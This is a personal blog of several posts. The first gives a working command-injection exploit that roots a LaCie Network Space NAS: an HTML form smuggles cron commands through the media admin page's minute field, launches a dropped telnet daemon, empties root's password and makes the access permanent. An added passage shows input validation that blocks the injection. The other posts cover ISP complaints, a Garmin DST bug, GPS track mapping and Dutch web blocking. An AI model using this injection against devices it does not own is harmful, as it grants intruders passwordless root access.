Get a root shell on a LaCie Network Space device without physically opening the device

About the NAS

LaCie Network Space


I own a 1 TB LaCie Network Space device. This device, a Network Attached Storage (NAS) unit, hooks onto your (local) network and lets you access files via file and print sharing, FTP and other protocols. Very handy, if it works as you expect it to.
The NAS has an ARM926EJ-S processor, a 1 TB hard disk, 16 MB of memory, a USB port and no fan (which makes it pretty quiet).

Problem

My problem with the NAS is that the kernel running on the device starts killing processes when I copy very large (2 GB+) files to the NAS via file and print sharing (using the Samba server). This broke my device in such a way that it became unusable (no admin panel, though still pingable). Therefore I sent the device for RMA to LaCie’s service desk, where it was repaired.
At least I thought it was, because after copying those large files again, the device broke again, but this time I was luckily still able to reboot and keep the device up for a little while before it required a new reboot. :|
The system log showed a kernel that was randomly killing processes. I expect this might be caused by the autoscan feature that indexes the media on the device, or maybe the device just doesn’t have enough memory to cope with the continuous transfer of big files. Not funny for a € 160,- device.

Getting root

I decided I didn’t want to submit the device for RMA again and wanted to get root access to the device and repair it (read: make it more stable) myself. However, I didn’t want to physically open the device and void the warranty. Luckily you don’t have to, at least not when your device is running firmware 1.1.8, as I found out thanks to a post from user ‘hardel09’ (read here). You should only proceed when you understand what you are doing. If you do anything wrong, it can break your device.

Take the following steps:

  1. Save the content below as an HTML page. The form posts to the NAS’s media (autoscan) admin page, and the text in its minute field ends up in the crontab, which lets you abuse cron to execute the tasks you want:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Hack the NAS</title>
    </head>
    <body>
    <form name='edit_form' method='post' action='http://YOURDEVICE/cgi-bin/admin/media'>
    <input type='hidden' id='autoscn' name='autoscn' value='true' />
    <input type='hidden' id='modified' name='modified' value='true' />
    <input name='hour' value='12'/><input name='minute' value='50 12 * * * chmod 755 /home/openshare/utelnetd; /home/openshare/utelnetd &'/>
    <input type=submit value='SET CRONTAB'/>
    </form></body>
    </html>
  2. Change YOURDEVICE in the HTML file to the IP address or hostname of the NAS.
  3. Copy utelnetd to \\YOURDEVICE\openshare\utelnetd
  4. Open the HTML file with your favorite browser, fill in the current hour in the hour input field and fill the minute input field with the value below. Change the “HOUR” string to the current hour and change the “MINUTE” string to the next minute plus 2 minutes or so (leaving existing spaces intact), assuming the time on your NAS is set correctly (if not, correct it using the admin panel). Now click the SET CRONTAB button; after a few seconds you should end up at the administrator media page with the autoscan checkbox selected.
    MINUTE HOUR * * * chmod 755 /home/openshare/utelnetd;  /home/openshare/utelnetd &
  5. Now wait a few minutes, start your favorite network scanner tool and check whether port 23 on the NAS has appeared as open. If this is not the case, try again from step 4.
  6. If it is open, you can almost log in; you first need to set an (empty) password for the root user. Go to the HTML page again, change the “MINUTE” and “HOUR” strings again (leaving existing spaces intact) and add a command that makes root’s password empty:
    MINUTE HOUR * * * passwd -d root
  7. Log in as user root via telnet to get your root shell:

    root shell


  8. If you got a shell, congratulations, you did it! Now continue to make it permanent. Disable the cleanConf daemon, so your changes won’t be reversed when the NAS is rebooted:
    cd /etc/rc.d/rc3.d
    mkdir disabled
    mv S12cleanConf disabled
  9. Fix the hacked crontab by executing the command below and clearing the first line in the editor (which will disable autoscan):
    crontab -e
  10. Copy /home/openshare/utelnetd to /usr/bin and make it executable:
    cp /home/openshare/utelnetd /usr/bin
    chmod 755 /usr/bin/utelnetd
  11. Add a script in /etc/init.d/telnetd for starting utelnetd automatically. Mine looks like this:
    #!/bin/sh
    # Begin $rc_base/init.d/telnetd
     
    . /etc/sysconfig/rc
    . $rc_functions
     
    case "$1" in
            start)
                    echo "Starting telnetd server..."
                    /usr/bin/utelnetd &
                    ;;
     
            stop)
                    echo "Stopping telnetd server..."
     
                    killall utelnetd
                    ;;
            restart)
                    $0 stop
                    sleep 1
                    $0 start
                    ;;
     
            status)
                    statusproc utelnetd
                    ;;
     
            *)
                    echo "Usage: $0 {start|stop|restart|status}"
                    exit 1
                    ;;
    esac
     
    # End $rc_base/init.d/telnetd
  12. Enable the script by making symbolic links that point to the telnetd script:
    cd /etc/rc.d/rc3.d
    ln -s ../../init.d/telnetd S18telnetd
    cd /etc/rc.d/rc6.d
    ln -s ../../init.d/telnetd K12telnetd
  13. Make the script executable:
    chmod +x /etc/init.d/telnetd

That’s it. You can now reboot the device and utelnetd is automatically started after the reboot.

Now we have root

So what can you do with the device now you have root access to it?

  • Secure it. Anyone in your network who can reach the device via IP can currently connect to it without a password, so you might consider using OpenSSH instead of telnet as described here. You might want to secure the /www/cgi-bin/admin/media script as well, as it can easily be used to hack into the device.
  • Fix other problems with the software on the NAS that bother you.
  • Mount (multiple) partitions from an external mass-storage device and make it available on the network.
  • Use it as a BitTorrent client.
  • Run other (lightweight / self-compiled) applications on it.
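
Securing the media script, as suggested in the first point above, comes down to refusing anything but a plain number in the hour and minute fields before a crontab line is built from them. An added example of that check in POSIX sh (not LaCie's code and not from the original post; `AUTOSCAN_CMD` and the function names are placeholders, since the page does not show what the firmware actually schedules):

```sh
#!/bin/sh
# Added example: validate the 'hour' and 'minute' form fields before they
# are used to build a crontab line.
# AUTOSCAN_CMD is a placeholder; the real scheduled command is not on the page.
AUTOSCAN_CMD="/path/to/autoscan-placeholder"

# norm_field VALUE MAX
# Prints VALUE without a leading zero if it is a 1-2 digit decimal number
# in the range 0..MAX. Otherwise prints nothing and returns 1.
norm_field() {
    case "$1" in
        # empty, or any character that is not a digit: space, ';', '*', '&', newline
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "${#1}" -le 2 ] || return 1
    _n=${1#0}                 # "08" -> "8", "0" -> ""
    [ -n "$_n" ] || _n=0
    [ "$_n" -le "$2" ] || return 1
    printf '%s' "$_n"
}

# build_cron_line HOUR MINUTE
# Prints "MINUTE HOUR * * * command" only when both fields are valid.
build_cron_line() {
    _h=$(norm_field "$1" 23) || return 1
    _m=$(norm_field "$2" 59) || return 1
    printf '%s %s * * * %s\n' "$_m" "$_h" "$AUTOSCAN_CMD"
}

# Print the verdict for one form submission.
check() {
    if _line=$(build_cron_line "$1" "$2"); then
        printf 'ACCEPT  %s\n' "$_line"
    else
        printf 'REJECT  hour=[%s] minute=[%s]\n' "$1" "$2"
    fi
}

# Constructed submissions: a normal one, the two minute values used in the
# steps above, and an out-of-range minute.
check 12 50
check 12 '50 12 * * * chmod 755 /home/openshare/utelnetd; /home/openshare/utelnetd &'
check 12 '52 12 * * * passwd -d root'
check 12 61
```

Because the accepted values contain digits only, the field can no longer carry the extra schedule fields and command that the form in step 1 relies on.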

I hope this has helped anyone in any way :)


Issues with Dutch cable provider UPC

UPC is a service provider for Internet, television and telephone in the Netherlands. I don’t like UPC and I’m going to tell you why. If you are not interested you can stop reading now, but I need to get this off my chest.


Why UPC is a bad service provider (in random order)…

  • Since recently, UPC forces non-resolving domain requests on their default(!) DNS servers to resolve to a web page that HTTP 302 redirects you to their own “search” engine. So if you mistype a domain name, your browser redirects you, thereby invading your privacy and providing you with their full-banner “helper” webpage. This is against the DNS protocol.
    You can solve it by forcing your devices to use another set of DNS servers. For me this means I have to manually configure each network device because I cannot make my Thomson router distribute specific DNS host addresses via DHCP :(
    This site tells you more about the solution where you have to manually set your DNS servers.
  • I have a ‘royal subscription’ which means I get nine HD (High Definition) channels for 10 euro/month extra. UPC offers you another feature with this Royal subscription that is called Video On Demand (VOD). The feature is nice because they provide you with a lot of nice content (like series) that are watchable on demand, just like a dvd.
    The problem is that it often doesn’t work for me, giving me a VOD 103 exception. I’ve contacted support three times now about this issue and they still haven’t managed to locate the problem. Every time I have to convince them my signal is OK (using a special test channel). The problem is probably caused by undercapacity at their streaming servers, but people at the support desk simply follow protocol and never find the problem, so it never gets fixed.
  • I have a subscription where I have a combined box for telephone, internet (24 MBit) and (HD) television. I don’t want the phone, but I cannot just order only internet and television. I don’t want to pay for this crappy phone line that doesn’t allow me to dial +31(0)87 numbers (voip phone land-lines in the Netherlands). Another irritating issue is that when your broadband cable modem has no connection, people calling your number get a normal “phone is ringing”-tone on their side, and not a “number not reachable”-tone, which doesn’t help finding the problem.
    Besides that UPC tries to sell this product as a normal phone line, but instead it’s a very error-prone telephone line that you should not primarily rely on when you might need to call the alarm-number.
  • My (brand new) black colored ‘Media Box’ that provides me with HD television seems unstable. Sometimes – out of nothing – the screen just turns black, while the sound continues. Remote control activities don’t work any more and the device gets locked. In this case the device needs its power cable pulled and plugged back in, which costs me at least 60 seconds before the television gets back. Not funny when you were watching ‘time shifted’.
    I’ve also seen issues where the device automatically switches to the (of all channels) interactive ‘UPC’ channel, functionally “disabling” the number pad on your remote control so it will take you some time to get back to the non-interactive TV channels, while losing ‘time-shifted’ data as well. The remote control is not the problem (I’m using the Logitech Harmony nowadays), and there are numerous people on forums complaining about issues with the UPC media devices as well.
    I’m silently hoping they push a ‘all-problems-fixing’-firmware update soon.
  • UPC poisons their DNS servers with a blacklist so they can block domains hosting child pornography. The problem with this is that they are not open about it, so they manipulate your DNS requests without telling you about it. I wrote an article about that case specifically.
  • The Internet connection UPC provides is slow during evening hours and has connection dropouts very often. When I switch my Internet connection to another provider to check if it’s a local network issue, the connection is always back and better.
  • With my subscription, they do not allow me to pay ‘manually’ with so-called ‘accept giros’; instead they forced me to use automatic credit payment where they are in complete control. So if they make a mistake, it’s up to me to get the money back. Isn’t this against the law?
  • UPC violates your privacy. When you keep your default password, they get it in clear text on their screen at the help desk. If you play it nice, they’ll tell it to you. This endangers your privacy because it is the password that is also used for the mail account they offer you and provides you access to their service center where you can order new services as well. Don’t use their mail account if you are concerned about your privacy.
  • Something positive on the contrary is that they offer a very fast internet connection for almost the same price as you were already paying, an action that was just launched recently. The disadvantage of this is that their network gets more load, something that could explain the continuous connection drop-outs I’m continuously experiencing. They don’t seem to be prepared for Internet speed upgrades with their network.
  • When you call UPC on their special 0900 number, they charge a high price, especially when calling from a mobile phone. When your telephone line from UPC is dead, you cannot use their phone, so you are mostly stuck with a mobile phone.
    The high calling rate is not fancy, but I find it quite ok, because it prevents the waiting time due to customers only calling when they really have to. Still, their waiting time on average is too long, in my experience (> 5 minutes average).
    Besides that, when you call them, it takes you at least 2 minutes before you get through their menu, every time. Sigh.
    A refund for callers – if the problem is theirs – would be nice.
  • You cannot quit your contract with UPC whenever you want; you are stuck with them for at least one year. It’s not only UPC that plays this trick on you, there are other providers that do this to you as well.

So why do I still use UPC?

The reason for me still using UPC is that they are the only provider offering HD television to my home. Besides that, my ADSL line doesn’t seem to be capable of high speed Internet access (meaning 8 MBit+ downstream), and I want a reasonable upload speed as well.

If there is another provider for my region available that includes HD television and fast internet access, I’ll switch immediately.


GPSMAP 60 Daylight Saving Time (DST) sunset time bug

Garmin 60 'Sun and Moon' screen


I’ve discovered an issue with my Garmin GPS 60 CSx that I currently cannot find described anywhere else. It’s about the ‘Sun and Moon’ screen that shows you the sunrise and sunset information for a certain date and a certain location on earth, on a day where DST changes the time at night.
The problem seems to be that the DST is not taken into account when the GPS calculates the sunset and sunrise time for that day. The local time that is shown on the GPS device however is displayed correctly, so the DST change by itself seems to be working correctly.

Let me explain by giving an example…
We set the date to Sunday 29-MAR-09 which is the day that Western Europe switches from winter-time to summer-time at Sunday night from 2 AM to 3 AM (01:59:59 to 03:00:00 to be exact). At Saturday 28th, at any time, the sunset for that day is given at 19:04, which is correct. At Sunday 29th the sunset indicated on the GPS at 03:00 should be 20:06, but it’s not.
The next table should give an overview.

Location   Date/Time                    Expected sunset time  Actual sunset according to GPS
---------  ---------------------------  --------------------  ------------------------------
Amsterdam  Friday 27-MAR-2009 12:00     19:03                 19:03
Amsterdam  Saturday 28-MAR-2009 12:00   19:04                 19:04
Amsterdam  Saturday 28-MAR-2009 23:59   19:04                 19:04
Amsterdam  Sunday 29-MAR-2009 00:00     19:06                 19:06
Amsterdam  Sunday 29-MAR-2009 01:59     19:06                 19:06
Amsterdam  Sunday 29-MAR-2009 03:00     20:06                 19:06
Amsterdam  Sunday 29-MAR-2009 16:00     20:06                 19:06
Amsterdam  Monday 30-MAR-2009 00:00     20:08                 20:08

It seems that the current time is not taken into account when the GPS calculates the sunset and sunrise times, but only the date. This is OK, but not for dates where the time changes.

Report the bug
Does anyone know how to get a bug like this fixed with Garmin? I don’t want to explicitly contact their support because it is just a minor issue, though I think it would be nice if it would be fixed.

Conclusion
So if you happen to be trusting your GPS to tell you when the sun rises and sets like I do, beware that the time may be one hour off on days where the clock is set back or forward (mostly Sunday), depending on whether you use DST. I’ve seen this issue with the Garmin GPS 60CSx running the currently latest firmware (3.70).

Update 2009-05-24:
I submitted the bug with Garmin and got a response:
Thanks for your email, I will be happy to help. This is a bug that we have come across before from another customer. It only seems to appear when the time zone on the unit is set for Amsterdam. If the unit is set to the London time zone the Sunset error doesn’t appear. We will pass your comments onto our software team in the USA as this is something that could be fixed in a future software update but I can’t promise you that it will be.

Seems like there is a chance that it will be fixed!


Using multiple GPS tracklogs to create artistic views in Google Earth

Since June 2005, I’ve been collecting tracklog data using my Garmin GPS 60 (CSx). This means that every time I go cycle racing, walking, sailing, ice skating or even flying, I bring my Garmin, turn it on and (automatically) log the track.

After the track is completed for that activity, I archive it at home, as a GPX file, using Garmin’s MapSource.
I initially bought the GPS for tracklogging and navigational purposes for my bike trip from Arnhem (Netherlands) to Paris, but keeping all tracklogs did give me some other cool opportunity that I didn’t think of back then.
One example of that is gathering statistics about my cycleracing and mountainbiking trips, thereby motivating me to break new records and discover new terrain. Another cool purpose for all my tracklogs, and what this blog is about, is that I can visualize them (all at once) on Google Earth!

With Google Earth and converting tools like GPSBabel at our disposal, it’s possible to create a (big) Google Earth file of all tracklogs combined. When I try to combine, for example, the activities for which I have the most tracklogs available (cycle racing, mountainbiking, walking, cycling on my hybrid bike and sailing), I assign them a color so I can differentiate between different types of activities and create really cool and insightful maps, like this:

Combined tracklog view of the southern Veluwezoom area

In this picture, the red colored line stands for mountainbiking, purple stands for cycling with my hybrid bike, blue is used for cycle racing and green is for walking. If you look carefully, you can also guess where I must live somewhere :-)

This map might look not very organized or useful to other people, but for me, there are many, many stories and new ideas hidden in it.

There are a lot of interesting views possible, given my pretty large collection of tracklogs. This one for example is from my holiday last September in and around Cassis (south of France):

Combined tracklog from holiday in Cassis, France; viewed in Google Earth

The pink line shows a sailing trip we’ve taken. The green line shows the walk we took to Calanque d’En-vau and the blue line shows a cycle racing trip over the Route du Crête. If you ever want to visit this area, it’s a good idea to take my tracklogs, put them on your GPS and do the activities while you are in the area, so you don’t miss the ‘must-have-done’s’.

This whole thing looks somewhat like everytrail.com, where one can create some sort of “trackblog”, including photos that can be linked to the track. But an overview, loadable in Google Earth, is not one of the options they offer (yet). But maybe they will add it in the future, so, if you start uploading your tracks at everytrail.com now, an easy total view in Google Earth might not be so far away at all :)

Luckily you can create such a combined track yourself as well, however it requires some scripting knowledge. To combine the (GPX) files you can use gpsbabel, remove all but the track-information from the tracklog, for each of the tracklogs from a certain category, and output them to a kml or kmz file, a command that looks like this on unix:

/usr/local/bin/gpsbabel \
    -i gpx -f "Tracklogs Varen/20080611_Drangey_Sauðárkrókur.gpx" -x nuketypes,waypoints,routes \
    -i gpx -f "Tracklogs Varen/20080611_Sauðárkrókur_Drangey.gpx" -x nuketypes,waypoints,routes \
    -i gpx -f "Tracklogs Varen/20080824_RoelofarendsveenLeiden.gpx" -x nuketypes,waypoints,routes \
    -i gpx -f "Tracklogs Varen/20080908_CalanqueDePortMiou.gpx" -x nuketypes,waypoints,routes \
    -o kml,floating=0,labels=1,trackdata=1,line_color=FF00FF00,points=0,line_width=2 \
    -F "combined_varen.kml"

After that I load each kml file in Google Earth separately and assign it a unique color. By moving the track to the same folder in Google Earth, I can combine them to one track, with multiple colors per category. That’s all it takes.

The most current version of all my tracks in the categories cycleracing, ‘Cycleracing with hybrid bike’, sailing, mountainbiking, walking, ice skating and flying can be found in this automatically updated KML file.

Some more screenshots that I’ve taken are available here: http://public.hendricksen.eu/GpsArt/

combined tracklog view of 'de Liemers'

I hope I can inspire people to do the same, or at least motivate them to start collecting and archiving their own tracklogs, so at some point, they can create some cool maps just like I did with my tracklogs, and who knows, maybe start comparing those tracks.

Update 2009-12-03:
The latest combined tracks file (automatically updated) with all my cycling, walking, sailing and skating tracklogs is available here.


The blocking of child pornography in the Netherlands

Internet censorship is a hot topic nowadays, even here in the Netherlands. A lot is written about the Dutch government trying to reduce the accessibility and distribution of child pornography over the Internet, which is in general a good thing. A bad thing, on the contrary, is the way in which they try to do that, knowing about the Great Firewall of China.

I, as a curious Dutch citizen want to test what my government is doing to my Internet accessibility, after hearing rumors of blocks being applied. And to be very honest, I am also interested in the technical solution.
So, where do you start if you want to test this? Well, not with a Dutch government site where the magic black list is hosted of course, but by just reading slashdot.org that links you (indirectly) to wikileaks.org where a list of pages blocked by the Danish government was posted:
https://secure.wikileaks.org/wiki/Denmark:_3863_sites_on_censorship_list%2C_Feb_2008
Gosh, I wonder if this list might point me to some sites that are blocked in the Netherlands as well…

So, I started looking up url’s in the list at random. Most of them appear to be bogus sites, captured by domain hijackers and filled with total nonsense. But after 10 clicks or so, I found a website that was blocked: www dot am using – ki ds dot com. When opening this site via Dutch ISP UPC, I find the page to be on the Dutch black list, resulting in a “STOP” warning, as you can see here:

stop_childporn

(the page doesn’t look very professional, which I think shows similarities with the technical solution that is used to block websites)

A remarkable thing is, that when I make a request for the site via dutch ISP XS4ALL, (I happen to have two Internet connections at my disposal) the site isn’t blocked at all. I know XS4ALL criticizes the way this filtering is implemented, but not blocking access to the site…
Well, it could be that they just have a more recent version of the black list already, who knows. But still, I’m curious whether other Dutch ISP’s like Tiscali, Planet, KPN and even SurfNet (a provider for educational and research facilities) block this site and others do not…

Above all of this, I very much agree child porn should be stopped because it harms innocent children, but not by bringing the Freedom of Speech of the Internet to a risk (which costs you a lot of effort anyway because of the nature of the Internet) while not solving the problem at all. If there has to be a black list for the common Internet surfer (by that I mean that it helps against child pornography), then so be it.
But why can’t it be an open list, a list that is verifiable by everyone in the world, and a list that is used only for blocking what is considered real child pornography hosted on servers that cannot be taken down (because it is hosted in a country where the Dutch government has no jurisdiction)? The list should not be abused for blocking anything else but child pornography.

The obvious risk here is that the owner of the list might abuse it for blocking content that is unrelated to child pornography, but for example (seemingly) illegal content (warez) or blog posts with undesirable political contents.

The problem with child pornography is way bigger than the Internet. Censoring the Internet in the current way it is done is not really going to do any good against child abusers. So why spend taxes on this solution that is probably not solving anything?

Access to whatever material cannot be blocked unless you apply strategies like those described in Orwell’s 1984, where you have total control over people, where in this case you apply total control over the way in which the Internet can be accessed. The nature of the Internet makes this practically impossible without severely limiting one’s freedom on the Internet, thus blocking a few sites by poisoning the ISP’s DNS server, like is currently done, is not going to work.

Governments should invest in catching the sick people creating and distributing the CP. As I see it, that is not done by obfuscating DNS requests. IMHO the collateral damage violates the privacy and freedom of the common Internet user.

If you want to view the Dutch “STOP” website, you can just visit it:
http://212.142.48.139 (please note the stop sign, it animates, so cool)
